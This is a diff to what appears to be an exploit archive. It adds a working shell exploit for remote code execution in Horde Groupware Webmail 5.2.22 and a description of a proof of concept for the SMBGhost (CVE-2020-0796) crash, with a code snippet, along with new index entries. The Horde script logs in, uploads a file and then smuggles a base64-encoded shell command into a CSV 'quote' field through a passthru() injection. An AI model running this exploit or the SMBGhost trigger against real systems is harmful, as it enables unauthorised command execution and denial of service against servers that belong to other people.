diff --git a/exploits/php/webapps/48215.sh b/exploits/php/webapps/48215.sh new file mode 100755 index 000000000..4f6f24f5f --- /dev/null +++ b/exploits/php/webapps/48215.sh @@ -0,0 +1,41 @@ +#!/bin/sh + +if [ "$#" -ne 4 ]; then + echo '[!] Usage: ' 1>&2 + exit 1 +fi + +BASE="$1" +USERNAME="$2" +PASSWORD="$3" +COMMAND="$4" + +JAR="$(mktemp)" +trap 'rm -f "$JAR"' EXIT + +echo "[+] Logging in as $USERNAME:$PASSWORD" 1>&2 +curl -si -c "$JAR" "$BASE/login.php" \ + -d 'login_post=1' \ + -d "horde_user=$USERNAME" \ + -d "horde_pass=$PASSWORD" | grep -q 'Location: /services/portal/' || \ + echo '[!] Cannot log in' 1>&2 + +echo "[+] Uploading dummy file" 1>&2 +echo x | curl -si -b "$JAR" "$BASE/mnemo/data.php" \ + -F 'actionID=11' \ + -F 'import_step=1' \ + -F 'import_format=csv' \ + -F 'notepad_target=x' \ + -F 'import_file=@-;filename=x' \ + -so /dev/null + +echo "[+] Running command" 1>&2 +BASE64_COMMAND="$(echo -n "$COMMAND 2>&1" | base64 -w0)" +curl -b "$JAR" "$BASE/mnemo/data.php" \ + -d 'actionID=3' \ + -d 'import_step=2' \ + -d 'import_format=csv' \ + -d 'header=1' \ + -d 'fields=1' \ + -d 'sep=x' \ + --data-urlencode "quote=).passthru(base64_decode(\"$BASE64_COMMAND\")).die();}//\\" \ No newline at end of file diff --git a/exploits/windows/dos/48216.md b/exploits/windows/dos/48216.md new file mode 100644 index 000000000..5e1d56281 --- /dev/null +++ b/exploits/windows/dos/48216.md @@ -0,0 +1,29 @@ +# CVE-2020-0796 PoC aka CoronaBlue aka SMBGhost + +Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48216.zip + +## Usage + +`./CVE-2020-0796.py servername` + +This script connects to the target host, and compresses the authentication request with a bad offset field set in the transformation header, causing the decompressor to buffer overflow and crash the target. + +This contains a modification of the excellent [smbprotocol](https://github.com/jborean93/smbprotocol) with added support for SMB 3.1.1 compression/decompression (only LZNT1). Most of the additions are in `smbprotocol/connection.py`. A version of [lznt1](https://github.com/you0708/lznt1) is included, modified to support Python 3. + +The compression transform header is in the `SMB2CompressionTransformHeader` class there. The function `_compress` is called to compress tree requests. This is where the offset field is set all high to trigger the crash. + +```python + def _compress(self, b_data, session): + header = SMB2CompressionTransformHeader() + header['original_size'] = len(b_data) + header['offset'] = 4294967295 + header['data'] = smbprotocol.lznt1.compress(b_data) +``` + +## About + +CVE-2020-0796 is a bug in Windows 10 1903/1909's new SMB3 compression capability. SMB protocol version 3.1.1 introduces the ability for a client or server to advertise compression cabilities, and to selectively compress SMB3 messages as beneficial. To accomplish this, when negotiating an SMB session, the client and server must both include a `SMB2_COMPRESSION_CAPABILITIES` as documented in [MS-SMB2 2.2.3.1.3](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/78e0c942-ab41-472b-b117-4a95ebe88271). + +Once a session is negotiated with this capability, either the client or the server can selectively compress certain SMB messages. To do so, the entire SMB packet is compressed, and a transformed header is prepended, as documented in [MS-SMB2 2.2.42](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/1d435f21-9a21-4f4c-828e-624a176cf2a0). This header is a small (16 bytes) structure with a magic value, the uncompressed data size, the compression algorithm used, and an offset value. + +CVE-2020-0796 is caused by a lack of bounds checking in that offset size, which is directly passed to several subroutines. Passing a large value in will cause a buffer overflow, and crash the kernel. With further work, this could be developed into a RCE exploit. \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 7ebee40b7..1b539486e 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6685,6 +6685,7 @@ id,file,description,date,author,type,platform,port 48133,exploits/windows/dos/48133.py,"aSc TimeTables 2020.11.4 - Denial of Service (PoC)",2020-02-25,"Ismael Nava",dos,windows, 48136,exploits/windows/dos/48136.py,"Odin Secure FTP Expert 7.6.3 - Denial of Service (PoC)",2020-02-25,"berat isler",dos,windows, 48137,exploits/windows/dos/48137.py,"Core FTP LE 2.2 - Denial of Service (PoC)",2020-02-26,"Ismael Nava",dos,windows, +48216,exploits/windows/dos/48216.md,"Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Buffer Overflow (PoC)",2020-03-14,eerykitty,dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -42469,3 +42470,4 @@ id,file,description,date,author,type,platform,port 48209,exploits/php/webapps/48209.py,"Horde Groupware Webmail Edition 5.2.22 - PHP File Inclusion",2020-03-11,"Andrea Cardaci",webapps,php, 48210,exploits/php/webapps/48210.py,"Horde Groupware Webmail Edition 5.2.22 - PHAR Loading",2020-03-11,"Andrea Cardaci",webapps,php, 48212,exploits/linux/webapps/48212.txt,"Centos WebPanel 7 - 'term' SQL Injection",2020-03-13,"Berke YILMAZ",webapps,linux, +48215,exploits/php/webapps/48215.sh,"Horde Groupware Webmail Edition 5.2.22 - Remote Code Execution",2020-03-10,"Andrea Cardaci",webapps,php,